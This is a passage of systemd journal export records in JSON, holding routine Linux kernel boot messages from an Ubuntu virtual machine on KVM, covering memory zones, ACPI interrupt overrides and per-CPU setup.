"e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Early memory node ranges" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4a;b=e2b08827b5804427b422c10c84f1567e;m=558444;t=5bd16dd1903ab;x=220b66ff95907466", "__REALTIME_TIMESTAMP" : "1615280779887531", "__MONOTONIC_TIMESTAMP" : "5604420", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " node 0: [mem 0x0000000000001000-0x000000000009efff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4b;b=e2b08827b5804427b422c10c84f1567e;m=558451;t=5bd16dd1903b9;x=ebaa6321ff01d24f", "__REALTIME_TIMESTAMP" : "1615280779887545", "__MONOTONIC_TIMESTAMP" : "5604433", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : " node 0: [mem 0x0000000000100000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4c;b=e2b08827b5804427b422c10c84f1567e;m=55845b;t=5bd16dd1903c3;x=cecbae49965d8230", "__REALTIME_TIMESTAMP" : "1615280779887555", "__MONOTONIC_TIMESTAMP" : "5604443", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Reserved but unavailable: 98 pages" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4d;b=e2b08827b5804427b422c10c84f1567e;m=558465;t=5bd16dd1903cc;x=4ad7a4d8f6cac2ef", "__REALTIME_TIMESTAMP" : "1615280779887564", "__MONOTONIC_TIMESTAMP" : "5604453", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Initmem setup node 0 [mem 0x0000000000001000-0x000000007ffdbfff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4e;b=e2b08827b5804427b422c10c84f1567e;m=55846f;t=5bd16dd1903d6;x=39a566aa9c4d47fe", "__REALTIME_TIMESTAMP" : "1615280779887574", "__MONOTONIC_TIMESTAMP" : "5604463", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "On node 0 totalpages: 524154" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=4f;b=e2b08827b5804427b422c10c84f1567e;m=55847b;t=5bd16dd1903e3;x=b35787aecf128a45", "__REALTIME_TIMESTAMP" : "1615280779887587", "__MONOTONIC_TIMESTAMP" : "5604475", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 64 pages used for memmap" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=50;b=e2b08827b5804427b422c10c84f1567e;m=558485;t=5bd16dd1903ed;x=774bf1c47c000e10", "__REALTIME_TIMESTAMP" : "1615280779887597", "__MONOTONIC_TIMESTAMP" : "5604485", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", 
"_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 21 pages reserved" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=51;b=e2b08827b5804427b422c10c84f1567e;m=55848f;t=5bd16dd1903f7;x=cd8cce657b17ab84", "__REALTIME_TIMESTAMP" : "1615280779887607", "__MONOTONIC_TIMESTAMP" : "5604495", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA zone: 3998 pages, LIFO batch:0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=52;b=e2b08827b5804427b422c10c84f1567e;m=558499;t=5bd16dd190401;x=9e81a5d794812128", "__REALTIME_TIMESTAMP" : "1615280779887617", "__MONOTONIC_TIMESTAMP" : "5604505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA32 zone: 8128 pages used for memmap" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=53;b=e2b08827b5804427b422c10c84f1567e;m=5584a3;t=5bd16dd19040b;x=1bfa40fc3d32423e", "__REALTIME_TIMESTAMP" : "1615280779887627", "__MONOTONIC_TIMESTAMP" : "5604515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : " DMA32 zone: 520156 pages, LIFO batch:31" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=54;b=e2b08827b5804427b422c10c84f1567e;m=5584ad;t=5bd16dd190415;x=28af2f6ab1436462", "__REALTIME_TIMESTAMP" : "1615280779887637", "__MONOTONIC_TIMESTAMP" : "5604525", "_BOOT_ID" : 
"e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: PM-Timer IO Port: 0x608" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=55;b=e2b08827b5804427b422c10c84f1567e;m=5584b7;t=5bd16dd19041e;x=edf10699cb629bdf", "__REALTIME_TIMESTAMP" : "1615280779887646", "__MONOTONIC_TIMESTAMP" : "5604535", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: Local APIC address 0xfee00000" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=56;b=e2b08827b5804427b422c10c84f1567e;m=5584c1;t=5bd16dd190428;x=69ccfa8beb9c4d88", "__REALTIME_TIMESTAMP" : "1615280779887656", "__MONOTONIC_TIMESTAMP" : "5604545", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: LAPIC_NMI (acpi_id[0xff] dfl dfl lint[0x1])" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=57;b=e2b08827b5804427b422c10c84f1567e;m=5584cb;t=5bd16dd190432;x=f0a4d98fcffa2fec", "__REALTIME_TIMESTAMP" : "1615280779887666", "__MONOTONIC_TIMESTAMP" : "5604555", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "IOAPIC[0]: apic_id 0, version 17, address 0xfec00000, GSI 0-23" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=58;b=e2b08827b5804427b422c10c84f1567e;m=5584d5;t=5bd16dd19043d;x=9e51ba997007efbf", "__REALTIME_TIMESTAMP" : "1615280779887677", "__MONOTONIC_TIMESTAMP" : "5604565", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=59;b=e2b08827b5804427b422c10c84f1567e;m=5584df;t=5bd16dd190446;x=5903629783fb36b7", "__REALTIME_TIMESTAMP" : "1615280779887686", "__MONOTONIC_TIMESTAMP" : "5604575", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5a;b=e2b08827b5804427b422c10c84f1567e;m=5584e9;t=5bd16dd190450;x=7df2e11a07cddc34", "__REALTIME_TIMESTAMP" : "1615280779887696", "__MONOTONIC_TIMESTAMP" : "5604585", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5b;b=e2b08827b5804427b422c10c84f1567e;m=558514;t=5bd16dd19047b;x=443a95b1a9048bb8", "__REALTIME_TIMESTAMP" : "1615280779887739", "__MONOTONIC_TIMESTAMP" : "5604628", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", 
"SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5c;b=e2b08827b5804427b422c10c84f1567e;m=558520;t=5bd16dd190488;x=7c23e11ae8bb2c84", "__REALTIME_TIMESTAMP" : "1615280779887752", "__MONOTONIC_TIMESTAMP" : "5604640", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 high level)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5d;b=e2b08827b5804427b422c10c84f1567e;m=55852a;t=5bd16dd190491;x=8b2a8fb05353fa39", "__REALTIME_TIMESTAMP" : "1615280779887761", "__MONOTONIC_TIMESTAMP" : "5604650", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ0 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5e;b=e2b08827b5804427b422c10c84f1567e;m=558533;t=5bd16dd19049a;x=6649cd755b60f860", "__REALTIME_TIMESTAMP" : "1615280779887770", "__MONOTONIC_TIMESTAMP" : "5604659", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ5 used by override." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=5f;b=e2b08827b5804427b422c10c84f1567e;m=55853c;t=5bd16dd1904a3;x=d9afb5e94a1ac23d", "__REALTIME_TIMESTAMP" : "1615280779887779", "__MONOTONIC_TIMESTAMP" : "5604668", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ9 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=60;b=e2b08827b5804427b422c10c84f1567e;m=558548;t=5bd16dd1904af;x=fc6da1e0ce4bb742", "__REALTIME_TIMESTAMP" : "1615280779887791", "__MONOTONIC_TIMESTAMP" : "5604680", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ10 used by override." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=61;b=e2b08827b5804427b422c10c84f1567e;m=558551;t=5bd16dd1904b8;x=bcf5412d0124a136", "__REALTIME_TIMESTAMP" : "1615280779887800", "__MONOTONIC_TIMESTAMP" : "5604689", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "ACPI: IRQ11 used by override." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=62;b=e2b08827b5804427b422c10c84f1567e;m=55855a;t=5bd16dd1904c2;x=8336b9dc8a77e4ad", "__REALTIME_TIMESTAMP" : "1615280779887810", "__MONOTONIC_TIMESTAMP" : "5604698", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Using ACPI (MADT) for SMP configuration information" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=63;b=e2b08827b5804427b422c10c84f1567e;m=558574;t=5bd16dd1904db;x=7cb65efd0c394cd8", "__REALTIME_TIMESTAMP" : "1615280779887835", "__MONOTONIC_TIMESTAMP" : "5604724", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "smpboot: Allowing 1 CPUs, 0 hotplug CPUs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=64;b=e2b08827b5804427b422c10c84f1567e;m=55857e;t=5bd16dd1904e5;x=d33aaab4a9483d0", "__REALTIME_TIMESTAMP" : "1615280779887845", "__MONOTONIC_TIMESTAMP" : "5604734", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x00000000-0x00000fff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=65;b=e2b08827b5804427b422c10c84f1567e;m=558588;t=5bd16dd1904ef;x=fe55dbea91cdda3b", "__REALTIME_TIMESTAMP" : "1615280779887855", "__MONOTONIC_TIMESTAMP" : "5604744", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", 
"SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=66;b=e2b08827b5804427b422c10c84f1567e;m=558591;t=5bd16dd1904f9;x=10e4fdbaa37c6f61", "__REALTIME_TIMESTAMP" : "1615280779887865", "__MONOTONIC_TIMESTAMP" : "5604753", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x000a0000-0x000effff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=67;b=e2b08827b5804427b422c10c84f1567e;m=5585af;t=5bd16dd190516;x=40e1de179b1f3444", "__REALTIME_TIMESTAMP" : "1615280779887894", "__MONOTONIC_TIMESTAMP" : "5604783", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "PM: Registered nosave memory: [mem 0x000f0000-0x000fffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=68;b=e2b08827b5804427b422c10c84f1567e;m=5585c4;t=5bd16dd19052b;x=33b528785d423367", "__REALTIME_TIMESTAMP" : "1615280779887915", "__MONOTONIC_TIMESTAMP" : "5604804", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "e820: [mem 0x80000000-0xfeffbfff] available for PCI devices" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=69;b=e2b08827b5804427b422c10c84f1567e;m=5585db;t=5bd16dd190542;x=29dab73ca5d325d1", "__REALTIME_TIMESTAMP" : "1615280779887938", "__MONOTONIC_TIMESTAMP" : "5604827", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Booting paravirtualized kernel on KVM" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6a;b=e2b08827b5804427b422c10c84f1567e;m=5585e4;t=5bd16dd19054c;x=a6da58fbae596331", "__REALTIME_TIMESTAMP" : "1615280779887948", "__MONOTONIC_TIMESTAMP" : "5604836", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6b;b=e2b08827b5804427b422c10c84f1567e;m=5585ed;t=5bd16dd190555;x=c98a8259479b7ba3", "__REALTIME_TIMESTAMP" : "1615280779887957", "__MONOTONIC_TIMESTAMP" : "5604845", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "random: get_random_bytes called from start_kernel+0x99/0x4fd with crng_init=0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6c;b=e2b08827b5804427b422c10c84f1567e;m=5585f7;t=5bd16dd19055e;x=257d9b7f616e4ee1", "__REALTIME_TIMESTAMP" : "1615280779887966", "__MONOTONIC_TIMESTAMP" : "5604855", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : 
"0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "setup_percpu: NR_CPUS:8192 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6d;b=e2b08827b5804427b422c10c84f1567e;m=558600;t=5bd16dd190567;x=ee52472a4f3cd07c", "__REALTIME_TIMESTAMP" : "1615280779887975", "__MONOTONIC_TIMESTAMP" : "5604864", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "percpu: Embedded 46 pages/cpu s151552 r8192 d28672 u2097152" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6e;b=e2b08827b5804427b422c10c84f1567e;m=55860c;t=5bd16dd190574;x=1636d8827d3d709f", "__REALTIME_TIMESTAMP" : "1615280779887988", "__MONOTONIC_TIMESTAMP" : "5604876", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "pcpu-alloc: s151552 r8192 d28672 u2097152 alloc=1*2097152" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=6f;b=e2b08827b5804427b422c10c84f1567e;m=558616;t=5bd16dd19057e;x=ff4d9ed204ab9f76", "__REALTIME_TIMESTAMP" : "1615280779887998", "__MONOTONIC_TIMESTAMP" : "5604886", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "pcpu-alloc: [0] 0 " } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=70;b=e2b08827b5804427b422c10c84f1567e;m=55861f;t=5bd16dd190587;x=4af90f064f9bfc08", "__REALTIME_TIMESTAMP" : "1615280779888007", "__MONOTONIC_TIMESTAMP" : "5604895", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "KVM setup async PF for cpu 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=71;b=e2b08827b5804427b422c10c84f1567e;m=558628;t=5bd16dd190590;x=62d11143cd575a88", "__REALTIME_TIMESTAMP" : "1615280779888016", "__MONOTONIC_TIMESTAMP" : "5604904", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-stealtime: cpu 0, msr 7fc24040" } { "__CURSOR" : 